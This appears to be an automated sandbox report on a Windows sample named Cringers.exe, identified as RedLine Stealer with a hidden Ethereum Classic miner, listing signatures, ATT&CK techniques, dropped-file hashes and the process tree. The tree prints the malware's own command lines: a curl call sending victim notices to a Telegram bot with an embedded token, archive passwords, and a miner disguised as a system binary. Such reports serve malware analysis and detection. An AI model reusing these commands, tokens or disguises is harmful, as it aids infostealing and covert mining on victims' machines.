Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-en-20211014
  • submitted
    05-12-2021 14:55

General

  • Target

    Cringers.exe

  • Size

    1.5MB

  • MD5

    f79d68c8b8baac77eea56ffdecc010c1

  • SHA1

    3b5996718d1fcb3f937d4a508cab257d21493059

  • SHA256

    c4b2fb2998f0c6cd914723a5855116dcbe582d8875e25e424d99064e243ff971

  • SHA512

    ad98de3d6e36803e7eaa11fd8e296e5194077106a92f40b045f3a6ff135ef09f4be9a6bc8071f53df7b3686123ea07bcde6a7c042668a7253675c54cb2732a79

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 6 IoCs
  • UPX packed file 9 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 11 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Cringers.exe
    "C:\Users\Admin\AppData\Local\Temp\Cringers.exe"
    1⤵
    • Checks BIOS information in registry
    • Loads dropped DLL
    • Checks whether UAC is enabled
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:820
    • C:\Users\Admin\AppData\Local\Temp\svhost.exe
      "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Modifies system certificate store
      • Suspicious use of WriteProcessMemory
      PID:1424
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c curl "https://api.telegram.org/bot5080947553:AAFY7o6U7eYnp2cSVZgI5zrrBthTLC1DEQo/sendMessage?chat_id=783936763&text=%F0%9F%90%B7%20%D0%A3%20%D0%B2%D0%B0%D1%81%20%D0%BD%D0%BE%D0%B2%D1%8B%D0%B9%20%D0%B2%D0%BE%D1%80%D0%BA%D0%B5%D1%80!%0A%D0%92%D0%B8%D0%B4%D0%B5%D0%BE%D0%BA%D0%B0%D1%80%D1%82%D0%B0%3A%20Standard VGA Graphics Adapter%0A(Windows%20Defender%20has%20been%20turned%20off)"
        3⤵
          PID:1208
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
          3⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:340
          • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
            C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:428
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1792
          • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
            C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:1812
        • C:\Windows\bfsvc.exe
          C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x7531B4866f890E27b546527643D1Bc04121Cd62f -coin etc -worker EasyMiner_Bot -clKernel 3
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          PID:1764
        • C:\Windows\explorer.exe
          C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x7531B4866f890E27b546527643D1Bc04121Cd62f -coin etc -worker EasyMiner_Bot -clKernel 3
          3⤵
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          PID:1704
          • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
            "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
            4⤵
            • Executes dropped EXE
            • Adds Run key to start application
            PID:1100
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
              5⤵
              • Loads dropped DLL
              PID:1424
              • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
                C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of AdjustPrivilegeToken
                PID:1604
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
              5⤵
                PID:1212
                • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
                  C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1556
              • C:\Windows\bfsvc.exe
                C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x7531B4866f890E27b546527643D1Bc04121Cd62f -coin etc -worker EasyMiner_Bot -clKernel 3
                5⤵
                  PID:860

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Persistence

        Modify Existing Service

        1
        T1031

        Registry Run Keys / Startup Folder

        1
        T1060

        Defense Evasion

        Modify Registry

        3
        T1112

        Disabling Security Tools

        1
        T1089

        Virtualization/Sandbox Evasion

        1
        T1497

        Install Root Certificate

        1
        T1130

        Credential Access

        Credentials in Files

        2
        T1081

        Discovery

        Query Registry

        3
        T1012

        Virtualization/Sandbox Evasion

        1
        T1497

        System Information Discovery

        3
        T1082

        Collection

        Data from Local System

        2
        T1005

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\12B578593FDE07EC53D020B1D5DEBF3B_5D74C2DB556F94499BCD6D74A36958A3
          MD5

          7191cb07394cb5a7d94d627d1d3bee17

          SHA1

          c79ebdd9c2c02c7cc3fa28117f2ca1f2389687b3

          SHA256

          d9a942627e83efe031ae997312550ddc6445e779d4088031f8380ad00f7c1da3

          SHA512

          68068141ee7c9a2c17f9b4089967b4565e08771a5d897c3d6311eb97639db6690ed649fc8c69e8137ce8f1f363dce112822c97924bda25469ed930dad34cb0a1

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2A7611428D62805A3E4E5BC4103D82E4_D0FA13DADFB59BDF00C474952E166CC1
          MD5

          bade7875c04a55961d97e91eb64a557a

          SHA1

          a3579cb55e58e8721e2e87421658004c5489e82a

          SHA256

          24bea066cb6b59985b354a6b69a283f36bf14c46ddb8b44c4dfaa3a2e5ffa753

          SHA512

          9b24c6fe6bc3c532c752146f0c28818fdae10bfa180950ce4f193de48b116e6ac2c076e5349082483f7dc9c6136ffd8e8e27f84a630517583096858ae45b0b20

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
          MD5

          acaeda60c79c6bcac925eeb3653f45e0

          SHA1

          2aaae490bcdaccc6172240ff1697753b37ac5578

          SHA256

          6b0ceccf0103afd89844761417c1d23acc41f8aebf3b7230765209b61eee5658

          SHA512

          feaa6e7ed7dda1583739b3e531ab5c562a222ee6ecd042690ae7dcff966717c6e968469a7797265a11f6e899479ae0f3031e8cf5bebe1492d5205e9c59690900

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB
          MD5

          15092557fcf7db9fd811a776f81700d0

          SHA1

          55c32f4742e63a31fe8f349aae4ec2c822c92f3e

          SHA256

          a312faa9d394569eae83c1d4a3554c29fa7c445e76304e7831144f3c5f98994e

          SHA512

          56743843501691f9fc54ce64707d4b53f755a13997dadfb2809bd423295ec5746df2f606266dd75de1b895b75a5cf211ebd86a15f90aa81149ee4a5725bfa23e

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\12B578593FDE07EC53D020B1D5DEBF3B_5D74C2DB556F94499BCD6D74A36958A3
          MD5

          90bb53d08f8b050991a5b6d5cbd7137d

          SHA1

          f41ce89a15cdad5b5d64f996fb6d4db6c58959f3

          SHA256

          a9d42010e2785f63d2368640f6532076e1f4153ee9587e314007b044ba632071

          SHA512

          32e75bb80c6710017adc805e61344b77b9f31fddb69f2ae3c5bbc6fb0a2f39d36b94094bcd5e3bd012d69d0a094335f91cd35b7d85aaf1af60881962acaca28b

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2A7611428D62805A3E4E5BC4103D82E4_D0FA13DADFB59BDF00C474952E166CC1
          MD5

          aa98fb975829009a87f89b68d6cf3f21

          SHA1

          7707b535a84e137c7efb40c45d3a663ab62cac8a

          SHA256

          29176a3f137000854e2a709286c1ec783d7250020484711002d79b74e5372285

          SHA512

          cccee1f9ac763cff7754ea63c5001bf83ca3f92c67f8e4bc3ecc31d3ac7d96b269ab98b902702828e181a900cc5620f7105a2838ec6c35a827507b7e6c7c7809

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          MD5

          5a73867157031aedffa9a9be82b7e141

          SHA1

          f34c2540163336d65e823ec3bfc936a321ac904e

          SHA256

          81a47fa816b94b65ce67f2e6df740e5e9d819bced1c81e05fbe56ae18157663d

          SHA512

          e7f93165a00e24526fbe7104a4410b0bd8c43f240621ed79344d1ec084bbf686d1b8eea0f01f4f5de5db0e2ec2372e233f47eb66dd8e328d72c271f82a5bdfb9

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB
          MD5

          b3a139a5cc933c7cd17badda6f717695

          SHA1

          a14247ff8eab495787ae2fc71737d277c0038e5c

          SHA256

          3734fa9c446bdd985a1c44e72fff4a3fa4485976b2b764a8773c0f43e88542d8

          SHA512

          e2a5c3c80942c45bc0b6f7c42d28febd9f7cef0f9648d46fbba448ae2a5c368f883a4c587d4aedc6f512893c770cba61fcd18c82370b222fb2c9720fdacafbeb

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\KC94CCU5\7z[1].dll
          MD5

          42336b5fc6be24babfb87699c858fb27

          SHA1

          38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

          SHA256

          b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

          SHA512

          f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MWR70CEF\RegData_Temp[1].zip
          MD5

          1543b223f63fda679a94d034d23b27ba

          SHA1

          82eb69d0d096ff966679ce92c4fb2dd5a8dd6f1e

          SHA256

          30868a1cadb90f598ec9d96f93650c90883941522134b2e0a2dfeca958958e34

          SHA512

          270de3749322416e371d5177b974450e5e2fbca3570179d2f4811f1fda55aca4ea82cbd0a37d1b56ee8614be154373054b573da854a818caafb41b3cee502f78

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PBXRT4TL\RegHost_Temp[1].zip
          MD5

          32ab3a6509fe78d666dcafc5be73f2e1

          SHA1

          c16e1c2716b4ae5b9e5bfb9773d810344b539126

          SHA256

          dd2170bbea158a2c2b8c262c2be9c8d91fc3e86efe7f607fce7a9224a389bdec

          SHA512

          c31ee784de253c4f5c36990959d8e6f74b2b0eeecfd265cab2d5295be33f7af056e144d829adcd754c78e06023816cb3f576110314717ee7e50cc0af507f02fe

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RHI8KPQK\7z[1].exe
          MD5

          86e8388e83be8909d148518cf7b6e083

          SHA1

          4f7fdcf3abc0169b591e502842be074a5188c2c9

          SHA256

          4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

          SHA512

          2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

        • C:\Users\Admin\AppData\Local\Temp\svhost.exe
          MD5

          42ce12c674a64387e1f7bbfd4491b03d

          SHA1

          472beb49130cc19dbdd5dce8a09234103d3c72a0

          SHA256

          87087dc5efa0b2f0ff2b2d0052fa09c26609f3ebf3fe78d92de9f027abd13177

          SHA512

          371dae7c04548124aece3fb208bdaa0650cbd501a9747c6423b36517b1dc78395492beafd8becbe49e50736de06ff81c0fb42d820213637a3c05e7fec02ecd7a

        • C:\Users\Admin\AppData\Local\Temp\svhost.exe
          MD5

          42ce12c674a64387e1f7bbfd4491b03d

          SHA1

          472beb49130cc19dbdd5dce8a09234103d3c72a0

          SHA256

          87087dc5efa0b2f0ff2b2d0052fa09c26609f3ebf3fe78d92de9f027abd13177

          SHA512

          371dae7c04548124aece3fb208bdaa0650cbd501a9747c6423b36517b1dc78395492beafd8becbe49e50736de06ff81c0fb42d820213637a3c05e7fec02ecd7a

        • C:\Users\Admin\AppData\Roaming\Microsoft\7z.dll
          MD5

          42336b5fc6be24babfb87699c858fb27

          SHA1

          38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

          SHA256

          b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

          SHA512

          f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

        • C:\Users\Admin\AppData\Roaming\Microsoft\7z.dll
          MD5

          42336b5fc6be24babfb87699c858fb27

          SHA1

          38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

          SHA256

          b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

          SHA512

          f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

        • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
          MD5

          86e8388e83be8909d148518cf7b6e083

          SHA1

          4f7fdcf3abc0169b591e502842be074a5188c2c9

          SHA256

          4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

          SHA512

          2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

        • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
          MD5

          86e8388e83be8909d148518cf7b6e083

          SHA1

          4f7fdcf3abc0169b591e502842be074a5188c2c9

          SHA256

          4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

          SHA512

          2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

        • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
          MD5

          86e8388e83be8909d148518cf7b6e083

          SHA1

          4f7fdcf3abc0169b591e502842be074a5188c2c9

          SHA256

          4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

          SHA512

          2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

        • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
          MD5

          86e8388e83be8909d148518cf7b6e083

          SHA1

          4f7fdcf3abc0169b591e502842be074a5188c2c9

          SHA256

          4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

          SHA512

          2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

        • C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.exe
          MD5

          67a55e73dc3e285f5ecad2f52e4606aa

          SHA1

          280b8d8083aac33e1b05078bb6706f155cae47c7

          SHA256

          fc0e21a8e33d53a30207d3e0e3dc9079e253fc623cc4835877cbc39ca7a826a3

          SHA512

          e12b564cc866d3d50246c4326e0086daa3086adf8084f69c1f0fa49a091ed9a2c93ea07a2f6cc4eec30dea54492dbf12950e8e3e7f6c26208f7b57860f362efe

        • C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip
          MD5

          1543b223f63fda679a94d034d23b27ba

          SHA1

          82eb69d0d096ff966679ce92c4fb2dd5a8dd6f1e

          SHA256

          30868a1cadb90f598ec9d96f93650c90883941522134b2e0a2dfeca958958e34

          SHA512

          270de3749322416e371d5177b974450e5e2fbca3570179d2f4811f1fda55aca4ea82cbd0a37d1b56ee8614be154373054b573da854a818caafb41b3cee502f78

        • C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip
          MD5

          1543b223f63fda679a94d034d23b27ba

          SHA1

          82eb69d0d096ff966679ce92c4fb2dd5a8dd6f1e

          SHA256

          30868a1cadb90f598ec9d96f93650c90883941522134b2e0a2dfeca958958e34

          SHA512

          270de3749322416e371d5177b974450e5e2fbca3570179d2f4811f1fda55aca4ea82cbd0a37d1b56ee8614be154373054b573da854a818caafb41b3cee502f78

        • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
          MD5

          42ce12c674a64387e1f7bbfd4491b03d

          SHA1

          472beb49130cc19dbdd5dce8a09234103d3c72a0

          SHA256

          87087dc5efa0b2f0ff2b2d0052fa09c26609f3ebf3fe78d92de9f027abd13177

          SHA512

          371dae7c04548124aece3fb208bdaa0650cbd501a9747c6423b36517b1dc78395492beafd8becbe49e50736de06ff81c0fb42d820213637a3c05e7fec02ecd7a

        • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
          MD5

          42ce12c674a64387e1f7bbfd4491b03d

          SHA1

          472beb49130cc19dbdd5dce8a09234103d3c72a0

          SHA256

          87087dc5efa0b2f0ff2b2d0052fa09c26609f3ebf3fe78d92de9f027abd13177

          SHA512

          371dae7c04548124aece3fb208bdaa0650cbd501a9747c6423b36517b1dc78395492beafd8becbe49e50736de06ff81c0fb42d820213637a3c05e7fec02ecd7a

        • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.exe
          MD5

          9d99b4d43e4e7a0408c5fe99b4cc4afe

          SHA1

          702436963243f0de2d431ec29b199505a0aa3b90

          SHA256

          c9e36c039bfc370135feabad11840fe457caec3c4914351461f3f9e115194fb3

          SHA512

          44620e76efc6d0cefc1c6f8eca77c0114d41fbf4d6e1f6ff2287286ff57aca1679a0428b35c757afb96fd31d99de8b9e1d956b89636d9c373248e5c5b5b05754

        • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.exe
          MD5

          9d99b4d43e4e7a0408c5fe99b4cc4afe

          SHA1

          702436963243f0de2d431ec29b199505a0aa3b90

          SHA256

          c9e36c039bfc370135feabad11840fe457caec3c4914351461f3f9e115194fb3

          SHA512

          44620e76efc6d0cefc1c6f8eca77c0114d41fbf4d6e1f6ff2287286ff57aca1679a0428b35c757afb96fd31d99de8b9e1d956b89636d9c373248e5c5b5b05754

        • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip
          MD5

          32ab3a6509fe78d666dcafc5be73f2e1

          SHA1

          c16e1c2716b4ae5b9e5bfb9773d810344b539126

          SHA256

          dd2170bbea158a2c2b8c262c2be9c8d91fc3e86efe7f607fce7a9224a389bdec

          SHA512

          c31ee784de253c4f5c36990959d8e6f74b2b0eeecfd265cab2d5295be33f7af056e144d829adcd754c78e06023816cb3f576110314717ee7e50cc0af507f02fe

        • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip
          MD5

          32ab3a6509fe78d666dcafc5be73f2e1

          SHA1

          c16e1c2716b4ae5b9e5bfb9773d810344b539126

          SHA256

          dd2170bbea158a2c2b8c262c2be9c8d91fc3e86efe7f607fce7a9224a389bdec

          SHA512

          c31ee784de253c4f5c36990959d8e6f74b2b0eeecfd265cab2d5295be33f7af056e144d829adcd754c78e06023816cb3f576110314717ee7e50cc0af507f02fe

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\WETB22O9.txt
          MD5

          bee222d82bc6fc28b3ac1ecd5f2f4aac

          SHA1

          bd7adac873daec9b7a769baacf81a95dfb8e55a7

          SHA256

          ceb3d49c4205f124134cbc1cd5b2596036c0cee4f3f127b274e18259be2af668

          SHA512

          14f47d45e44e952344148e5d97496d248c39a6e75a5731195ba70ad2a415dba0a78fbf6e7320fc8117b85c30a4a3286da6b6674661044464aefbcd9289cb4d8c

        • \Users\Admin\AppData\Local\Temp\svhost.exe
          MD5

          42ce12c674a64387e1f7bbfd4491b03d

          SHA1

          472beb49130cc19dbdd5dce8a09234103d3c72a0

          SHA256

          87087dc5efa0b2f0ff2b2d0052fa09c26609f3ebf3fe78d92de9f027abd13177

          SHA512

          371dae7c04548124aece3fb208bdaa0650cbd501a9747c6423b36517b1dc78395492beafd8becbe49e50736de06ff81c0fb42d820213637a3c05e7fec02ecd7a

        • \Users\Admin\AppData\Local\Temp\svhost.exe
          MD5

          42ce12c674a64387e1f7bbfd4491b03d

          SHA1

          472beb49130cc19dbdd5dce8a09234103d3c72a0

          SHA256

          87087dc5efa0b2f0ff2b2d0052fa09c26609f3ebf3fe78d92de9f027abd13177

          SHA512

          371dae7c04548124aece3fb208bdaa0650cbd501a9747c6423b36517b1dc78395492beafd8becbe49e50736de06ff81c0fb42d820213637a3c05e7fec02ecd7a

        • \Users\Admin\AppData\Local\Temp\svhost.exe
          MD5

          42ce12c674a64387e1f7bbfd4491b03d

          SHA1

          472beb49130cc19dbdd5dce8a09234103d3c72a0

          SHA256

          87087dc5efa0b2f0ff2b2d0052fa09c26609f3ebf3fe78d92de9f027abd13177

          SHA512

          371dae7c04548124aece3fb208bdaa0650cbd501a9747c6423b36517b1dc78395492beafd8becbe49e50736de06ff81c0fb42d820213637a3c05e7fec02ecd7a

        • \Users\Admin\AppData\Roaming\Microsoft\7z.dll
          MD5

          42336b5fc6be24babfb87699c858fb27

          SHA1

          38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

          SHA256

          b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

          SHA512

          f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

        • \Users\Admin\AppData\Roaming\Microsoft\7z.dll
          MD5

          42336b5fc6be24babfb87699c858fb27

          SHA1

          38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

          SHA256

          b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

          SHA512

          f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

        • \Users\Admin\AppData\Roaming\Microsoft\7z.dll
          MD5

          42336b5fc6be24babfb87699c858fb27

          SHA1

          38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

          SHA256

          b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

          SHA512

          f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

        • \Users\Admin\AppData\Roaming\Microsoft\7z.dll
          MD5

          42336b5fc6be24babfb87699c858fb27

          SHA1

          38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

          SHA256

          b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

          SHA512

          f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

        • \Users\Admin\AppData\Roaming\Microsoft\7z.exe
          MD5

          86e8388e83be8909d148518cf7b6e083

          SHA1

          4f7fdcf3abc0169b591e502842be074a5188c2c9

          SHA256

          4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

          SHA512

          2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

        • \Users\Admin\AppData\Roaming\Microsoft\7z.exe
          MD5

          86e8388e83be8909d148518cf7b6e083

          SHA1

          4f7fdcf3abc0169b591e502842be074a5188c2c9

          SHA256

          4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

          SHA512

          2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

        • \Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
          MD5

          42ce12c674a64387e1f7bbfd4491b03d

          SHA1

          472beb49130cc19dbdd5dce8a09234103d3c72a0

          SHA256

          87087dc5efa0b2f0ff2b2d0052fa09c26609f3ebf3fe78d92de9f027abd13177

          SHA512

          371dae7c04548124aece3fb208bdaa0650cbd501a9747c6423b36517b1dc78395492beafd8becbe49e50736de06ff81c0fb42d820213637a3c05e7fec02ecd7a

        • \Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
          MD5

          42ce12c674a64387e1f7bbfd4491b03d

          SHA1

          472beb49130cc19dbdd5dce8a09234103d3c72a0

          SHA256

          87087dc5efa0b2f0ff2b2d0052fa09c26609f3ebf3fe78d92de9f027abd13177

          SHA512

          371dae7c04548124aece3fb208bdaa0650cbd501a9747c6423b36517b1dc78395492beafd8becbe49e50736de06ff81c0fb42d820213637a3c05e7fec02ecd7a

        • memory/340-116-0x0000000000000000-mapping.dmp
        • memory/428-118-0x0000000000000000-mapping.dmp
        • memory/820-105-0x0000000000400000-0x0000000000402000-memory.dmp
          Filesize

          8KB

        • memory/820-70-0x00000000034C0000-0x00000000034C1000-memory.dmp
          Filesize

          4KB

        • memory/820-100-0x00000000003E0000-0x00000000003E1000-memory.dmp
          Filesize

          4KB

        • memory/820-102-0x0000000000E70000-0x0000000000E71000-memory.dmp
          Filesize

          4KB

        • memory/820-101-0x00000000028D0000-0x00000000028D1000-memory.dmp
          Filesize

          4KB

        • memory/820-103-0x00000000003E0000-0x00000000003E1000-memory.dmp
          Filesize

          4KB

        • memory/820-104-0x00000000003E0000-0x00000000003E1000-memory.dmp
          Filesize

          4KB

        • memory/820-55-0x0000000075821000-0x0000000075823000-memory.dmp
          Filesize

          8KB

        • memory/820-107-0x0000000005C10000-0x0000000005C11000-memory.dmp
          Filesize

          4KB

        • memory/820-98-0x00000000028E0000-0x00000000028E1000-memory.dmp
          Filesize

          4KB

        • memory/820-95-0x00000000028C0000-0x00000000028C1000-memory.dmp
          Filesize

          4KB

        • memory/820-57-0x00000000027E0000-0x00000000027E1000-memory.dmp
          Filesize

          4KB

        • memory/820-96-0x0000000002880000-0x0000000002881000-memory.dmp
          Filesize

          4KB

        • memory/820-97-0x0000000002870000-0x0000000002871000-memory.dmp
          Filesize

          4KB

